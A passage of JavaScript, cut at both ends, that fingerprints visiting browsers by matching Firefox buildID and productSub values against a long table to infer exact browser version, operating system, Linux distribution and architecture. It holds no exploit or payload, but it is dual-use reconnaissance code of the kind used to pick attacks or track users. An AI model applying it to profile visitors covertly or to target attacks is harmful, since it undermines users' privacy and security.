(version.match(/x86_64/)) { arch = arch_x86_64; } if (version.match(/Windows/)) { os_name = oses_windows; switch(version) { case "Windows NT 5.0": os_flavor = "2000"; break; case "Windows NT 5.1": os_flavor = "XP"; break; case "Windows NT 5.2": os_flavor = "2003"; break; case "Windows NT 6.0": os_flavor = "Vista"; break; case "Windows NT 6.1": os_flavor = "7"; break; case "Windows NT 6.2": os_flavor = "8"; break; } } if (version.match(/Linux/)) { os_name = oses_linux; } // end navigator.oscpu checks // buildID is unaffected by changes in the useragent and typically has // the compile date which in some cases can be used to map to specific // Version & O/S (including Distro and even Arch). Depending upon the // buildID, sometime navigator.productSub will be needed. // // This technique, and the laboriously compiled associated table, // submitted by Mark Fioravanti. var buildid = navigator.buildID; switch(buildid) { case "2008041514": ua_version = "3.0.0.b5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008041515": ua_version = "3.0.0.b5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2008052312": ua_version = "3.0.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008052906": ua_version = "3.0.0"; os_name = oses_windows; break; case "2008052909": ua_version = "3.0.0.rc1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008052912": ua_version = "3.0.0"; os_name = oses_linux; break; case "2008060309": ua_version = "3.0.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2008070205": ua_version = "2.0.0.16"; os_name = oses_windows; break; case "2008070206": ua_version = "3.0.1"; os_name = oses_linux; break; case "2008070208": ua_version = "3.0.1"; os_name = oses_windows; break; case "2008071222": ua_version = "3.0.1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008072820": switch (navigator.productSub) { case "2008072820": ua_version = "3.0.1"; os_name = oses_linux; break; case "2008092313": ua_version = "3.0.2"; os_name = oses_linux; break; } break; case "2008082909": ua_version = "2.0.0.17"; os_name = oses_windows; break; case "2008091618": ua_version = "3.0.2"; os_name = oses_linux; break; case "2008091620": ua_version = "3.0.2"; os_name = oses_windows; break; case "2008092313": ua_version = "3.0.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008092416": ua_version = "3.0.3"; os_name = oses_linux; break; case "2008092417": ua_version = "3.0.3"; os_name = oses_windows; break; case "2008092510": ua_version = "3.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008101315": switch (navigator.productSub) { case "2008101315": ua_version = "3.0.3"; os_name = oses_linux; break; case "2008111318": ua_version = "3.0.4"; os_name = oses_linux; arch = arch_x86; break; } break; case "2008102918": ua_version = "2.0.0.18"; os_name = oses_windows; break; case "2008102920": ua_version = "3.0.4"; break; case "2008112309": ua_version = "3.0.4"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.0.4 / Debian Testing (Lenny) case "2008111317": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008111318": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2008120119": ua_version = "2.0.0.19"; os_name = oses_windows; break; case "2008120121": ua_version = "3.0.5"; os_name = oses_linux; break; case "2008120122": ua_version = "3.0.5"; os_name = oses_windows; break; case "2008121623": ua_version = "2.0.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 2.0.0.19 / Ubuntu 8.04 LTS (Hardy Heron) case "2008121709": ua_version = "2.0.0.20"; os_name = oses_windows; break; case "2009011912": ua_version = "3.0.6"; os_name = oses_linux; break; case "2009011913": ua_version = "3.0.6"; os_name = oses_windows; break; case "2009012615": ua_version = "3.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009012616": ua_version = "3.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009021906": ua_version = "3.0.7"; os_name = oses_linux; break; case "2009021910": ua_version = "3.0.7"; os_name = oses_windows; break; case "2009030422": ua_version = "3.0.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009032608": ua_version = "3.0.8"; os_name = oses_linux; break; case "2009032609": ua_version = "3.0.8"; os_name = oses_windows; break; case "2009032711": ua_version = "3.0.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009033100": switch (navigator.productSub) { case "2009033100": ua_version = "3.0.8"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2009042113": ua_version = "3.0.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; } break; case "2009040820": ua_version = "3.0.9"; os_name = oses_linux; break; case "2009040821": ua_version = "3.0.9"; os_name = oses_windows; break; case "2009042113": ua_version = "3.0.10"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009042114": ua_version = "3.0.10"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2009042315": ua_version = "3.0.10"; os_name = oses_linux; break; case "2009042316": ua_version = "3.0.10"; os_name = oses_windows; break; case "20090427153806": ua_version = "3.5.0.b4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20090427153807": ua_version = "3.5.0.b4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "2009060214": ua_version = "3.0.11"; os_name = oses_linux; break; case "2009060215": ua_version = "3.0.11"; os_name = oses_windows; break; case "2009060308": switch (navigator.productSub) { case "2009060308": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; } break; case "2009060309": switch (navigator.productSub) { case "2009060309": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; } break; case "2009060310": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "BackTrack"; break; case "2009062005": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "PCLunixOS"; break; case "20090624012136": ua_version = "3.5.0"; os_name = oses_mac_osx; break; case "20090624012820": ua_version = "3.5.0"; os_name = oses_linux; break; case "20090701234143": ua_version = "3.5.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20090702060527": ua_version = "3.5.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "2009070610": ua_version = "3.0.12"; os_name = oses_linux; break; case "2009070611": ua_version = "3.0.12"; os_name = oses_windows; break; case "2009070811": ua_version = "3.0.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "20090715083437": ua_version = "3.5.1"; os_name = oses_mac_osx; break; case "20090715083816": ua_version = "3.5.1"; os_name = oses_linux; break; case "20090715094852": ua_version = "3.5.1"; os_name = oses_windows; break; case "2009072202": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Oracle"; break; case "2009072711": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "CentOS"; break; case "20090729211433": ua_version = "3.5.2"; os_name = oses_mac_osx; break; case "20090729211829": ua_version = "3.5.2"; os_name = oses_linux; break; case "20090729225027": ua_version = "3.5.2"; os_name = oses_windows; break; case "2009073021": ua_version = "3.0.13"; os_name = oses_linux; break; case "2009073022": ua_version = "3.0.13"; os_name = oses_windows; break; case "20090824085414": ua_version = "3.5.3"; os_name = oses_mac_osx; break; case "20090824085743": ua_version = "3.5.3"; os_name = oses_linux; break; case "20090824101458": ua_version = "3.5.3"; os_name = oses_windows; break; case "2009082707": ua_version = "3.0.14"; break; case "2009090216": ua_version = "3.0.14"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20090914014745": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break; case "20090915065903": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break; case "20090915070141": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break; case "20091007090112": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86 case "20091007095328": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64 case "2009101600": switch (navigator.productSub) { case "2009101600": ua_version = "3.0.15"; break; // Can be either Mac or Linux case "20091016": ua_version = "3.5.4"; os_name = oses_linux; os_flavor = "SUSE"; arch = arch_x86; break; } break; case "2009101601": ua_version = "3.0.15"; os_name = oses_windows; break; case "20091016081620": ua_version = "3.5.4"; os_name = oses_mac_osx; break; case "20091016081727": ua_version = "3.5.4"; os_name = oses_linux; break; case "20091016092926": ua_version = "3.5.4"; os_name = oses_windows; break; case "20091020122601": ua_version = "3.5.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64 case "2009102814": switch (navigator.productSub) { case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2009121602": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Mint"; break; case "2010021501": ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86; break; case "2010021502": ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break; } break; case "2009102815": switch (navigator.productSub) { case "2009102815": ua_version = "3.0.15"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; } break; case "20091029152254": ua_version = "3.6.0.b1"; os_name = oses_linux; break; case "20091029171059": ua_version = "3.6.0.b1"; os_name = oses_windows; break; case "20091102134505": ua_version = "3.5.5"; os_name = oses_mac_osx; break; case "20091102141836": ua_version = "3.5.5"; os_name = oses_linux; break; case "20091102152451": ua_version = "3.5.5"; os_name = oses_windows; break; case "2009110421": ua_version = "3.0.15"; os_name = oses_freebsd; arch = arch_x86; break; case "20091106091959": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break; case "20091106140514": ua_version = "3.5.5"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20091106145609": ua_version = "3.5.5"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20091108163911": ua_version = "3.6.0.b2"; os_name = oses_linux; break; case "20091108181924": ua_version = "3.6.0.b2"; os_name = oses_windows; break; case "20091109125225": switch (navigator.productSub) { case "20091109": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; } break; case "20091109134913": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20091115172547": ua_version = "3.6.0.b3"; os_name = oses_linux; break; case "20091115182845": ua_version = "3.6.0.b3"; os_name = oses_windows; break; case "20091124201530": ua_version = "3.6.0.b4"; os_name = oses_mac_osx; break; case "20091124201751": ua_version = "3.6.0.b4"; os_name = oses_linux; break; case "20091124213835": ua_version = "3.6.0.b4"; os_name = oses_windows; break; case "2009120100": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20091201203240": ua_version = "3.5.6"; os_name = oses_mac_osx; break; case "20091201204959": ua_version = "3.5.6"; os_name = oses_linux; break; case "20091201220228": ua_version = "3.5.6"; os_name = oses_windows; break; case "2009120206": ua_version = "3.0.16"; break; // Can be either Mac or Linux case "2009120208": ua_version = "3.0.16"; os_name = oses_windows; break; case "20091204132459": ua_version = "3.6.0.b5"; os_name = oses_linux; break; case "20091204132509": ua_version = "3.6.0.b5"; os_name = oses_mac_osx; break; case "20091204143806": ua_version = "3.6.0.b5"; os_name = oses_windows; break; case "20091215230859": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20091215230946": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20091215231400": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86 case "20091215231754": switch (navigator.productSub) { case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100106": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64 } break; case "2009121601": switch (navigator.productSub) { case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // Could also be Mint x86-64 } break; case "2009121602": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "20091216104148": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Mandriva"; break; case "20091216132458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20091216132537": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20091216142458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20091216142519": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "2009121708": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break; case "20091221151141": ua_version = "3.5.7"; os_name = oses_mac_osx; break; case "20091221152502": ua_version = "3.5.7"; os_name = oses_linux; break; case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux case "20091221164558": ua_version = "3.5.7"; os_name = oses_windows; break; case "2009122116": ua_version = "3.0.17"; os_name = oses_windows; break; case "2009122200": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20091223231431": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "PCLunixOS"; arch = arch_x86; break; case "20100105194006": ua_version = "3.6.0.rc1"; os_name = oses_mac_osx; break; case "20100105194116": ua_version = "3.6.0.rc1"; os_name = oses_linux; break; case "20100105212446": ua_version = "3.6.0.rc1"; os_name = oses_windows; break; case "2010010604": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "20100106054534": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86 case "20100106054634": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64 case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100106211825": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100106212742": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100106215614": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100110112429": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Mandriva"; break; case "20100115132715": ua_version = "3.6.0"; os_name = oses_mac_osx; break; case "20100115133306": ua_version = "3.6.0"; os_name = oses_linux; break; case "20100115144158": ua_version = "3.6.0"; os_name = oses_windows; break; case "20100125074043": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86 case "20100125074127": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64 case "20100125204847": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break; // Could also be Mint x86 case "20100125204903": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break; // Could also be Mint x86-64 case "20100202152834": ua_version = "3.5.8"; os_name = oses_mac_osx; break; case "20100202153512": ua_version = "3.5.8"; os_name = oses_linux; break; case "20100202165920": ua_version = "3.5.8"; os_name = oses_windows; break; case "2010020219": ua_version = "3.0.18"; os_name = oses_mac_osx; break; case "2010020220": ua_version = "3.0.18"; os_name = oses_windows; break; case "2010020400": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20100212131909": ua_version = "3.6.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100212132013": ua_version = "3.6.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100216105329": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100216105348": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100216105410": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100216110009": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "2010021718": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break; case "20100218022359": ua_version = "3.6.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100218022705": ua_version = "3.6.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100218112915": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break; case "20100222120605": ua_version = "3.6.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100222120717": ua_version = "3.6.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100301015346": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100305054927": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100307204001": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100308142847": ua_version = "3.6.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100308151019": ua_version = "3.6.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2010031218": ua_version = "3.0.19"; break; // Mac OS X or Linux case "2010031422": ua_version = "3.0.19"; os_name = oses_windows; break; case "20100315075757": ua_version = "3.5.9"; os_name = oses_linux; break; case "20100315080228": ua_version = "3.5.9"; os_name = oses_mac_osx; break; case "20100315083431": ua_version = "3.5.9"; os_name = oses_windows; break; case "20100316055951": ua_version = "3.6.2"; os_name = oses_mac_osx; break; case "20100316060223": ua_version = "3.6.2"; os_name = oses_linux; break; case "20100316074819": ua_version = "3.6.2"; os_name = oses_windows; break; case "2010031700": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20100323102218": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100323102339": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100323194640": ua_version = "3.6.2"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100324182054": ua_version = "3.6.2"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100330071911": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100330072017": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100330072020": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100330072034": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100401064631": ua_version = "3.6.3"; os_name = oses_mac_osx; break; case "20100401074458": ua_version = "3.6.3"; os_name = oses_linux; break; case "20100401080539": ua_version = "3.6.3"; os_name = oses_windows; break; case "20100401144201": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2010040116": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2010040118": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2010040119": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100401213457": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2010040123": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2010040200": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100402010516": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break; case "20100402041908": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100403042003": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100403082016": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100404024515": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100404024646": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100404104043": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break; case "20100409151117": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100409170726": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100412125148": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break; case "20100413152922": ua_version = "3.6.4.b1"; os_name = oses_mac_osx; break; case "20100413154310": ua_version = "3.6.4.b1"; os_name = oses_linux; break; case "20100413172113": ua_version = "3.6.4.b1"; os_name = oses_windows; break; case "20100415062243": ua_version = "3.6.3.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100415103754": ua_version = "3.6.3.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100416101101": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break; case "2010041700": ua_version = "3.6.4.1"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20100419015333": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100423043606": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break; case "20100423140709": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100423141150": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100423142835": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100502202326": ua_version = "3.6.4.b2"; os_name = oses_linux; break; case "20100502202401": ua_version = "3.6.4.b2"; os_name = oses_mac_osx; break; case "20100502221517": ua_version = "3.6.4.b2"; os_name = oses_windows; break; case "20100503113315": ua_version = "3.6.4.b3"; os_name = oses_mac_osx; break; case "20100503113541": ua_version = "3.6.4.b3"; os_name = oses_linux; break; case "20100503122926": ua_version = "3.6.4.b3"; os_name = oses_windows; break; case "20100504085637": ua_version = "3.5.10"; os_name = oses_linux; break; case "20100504085753": ua_version = "3.5.10"; os_name = oses_mac_osx; break; case "20100504093643": ua_version = "3.5.10"; os_name = oses_windows; break; case "2010050600": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "SUSE"; break; case "2010051300": ua_version = "3.6.4.1"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20100513134853": ua_version = "3.6.4.b4"; os_name = oses_mac_osx; break; case "20100513140540": ua_version = "3.6.4.b4"; os_name = oses_linux; break; case "20100513144105": ua_version = "3.6.4.b4"; os_name = oses_windows; break; case "20100513190740": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100523180910": ua_version = "3.6.4.b5"; os_name = oses_mac_osx; break; case "20100523181754": ua_version = "3.6.4.b5"; os_name = oses_linux; break; case "20100523185824": ua_version = "3.6.4.b5"; os_name = oses_windows; break; case "20100527084110": ua_version = "3.6.4.b6"; os_name = oses_mac_osx; break; case "20100527085242": ua_version = "3.6.4.b6"; os_name = oses_linux; break; case "20100527093236": ua_version = "3.6.4.b6"; os_name = oses_windows; break; case "2010061100": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20100611134546": ua_version = "3.6.4.b7"; os_name = oses_mac_osx; break; case "20100611135942": ua_version = "3.6.4.b7"; os_name = oses_linux; break; case "20100611143157": ua_version = "3.6.4.b7"; os_name = oses_windows; break; case "20100622203044": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100622203045": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100622204750": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100622204830": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100622205038": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break; case "20100623081410": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86_64; break; case "20100623081921": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break; case "20100623155731": ua_version = "3.6.4.b7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100623200132": ua_version = "3.6.4.b7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100625222733": ua_version = "3.6.6"; os_name = oses_linux; break; case "20100625223402": ua_version = "3.6.6"; os_name = oses_mac_osx; break; case "20100625231939": ua_version = "3.6.6"; os_name = oses_windows; break; case "20100626104508": ua_version = "3.6.4"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100627211341": ua_version = "3.6.4"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100628082832": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break; case "20100628124739": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100628143222": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100628232431": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100629034705": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100629105354": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break; case "20100630130433": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100630131607": ua_version = "4.0.0.b1"; os_name = oses_mac_osx; break; case "20100630132217": ua_version = "4.0.0.b1"; os_name = oses_linux; break; case "20100630141702": ua_version = "4.0.0.b1"; os_name = oses_windows; break; case "20100630174226": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break; case "20100630180611": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break; case "20100709115208": ua_version = "3.6.7.b1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100709183408": ua_version = "3.6.7.b1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100716093011": ua_version = "3.6.7.b2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20101203075014": ua_version = "3.6.13"; os_name = oses_windows; break; case "20101206122825": ua_version = "3.6.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "20110318052756": ua_version = "4.0"; os_name = oses_windows; break; // browsershots: Firefox 4.0 / Windows XP case "20110420144310": ua_version = "3.5.19"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.5.19 / Debian 4.0 (Etch) case "20110615151330": ua_version = "5.0"; os_name = oses_windows; break; // browsershots: Firefox 5.0 / Windows XP case "20110811165603": ua_version = "6.0"; os_name = oses_windows; break; // browsershots: Firefox 6.0 / Windows XP case "20110830092941": ua_version = "6.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 6.0.1 / Debian 4.0 (Etch) case "20110922153450": ua_version = "7.0"; os_name = oses_windows; break; // browsershots: Firefox 7.0 / Windows XP case "20110928134238": ua_version = "7.0.1"; os_name = oses_linux; os_flavor = "Debian"; 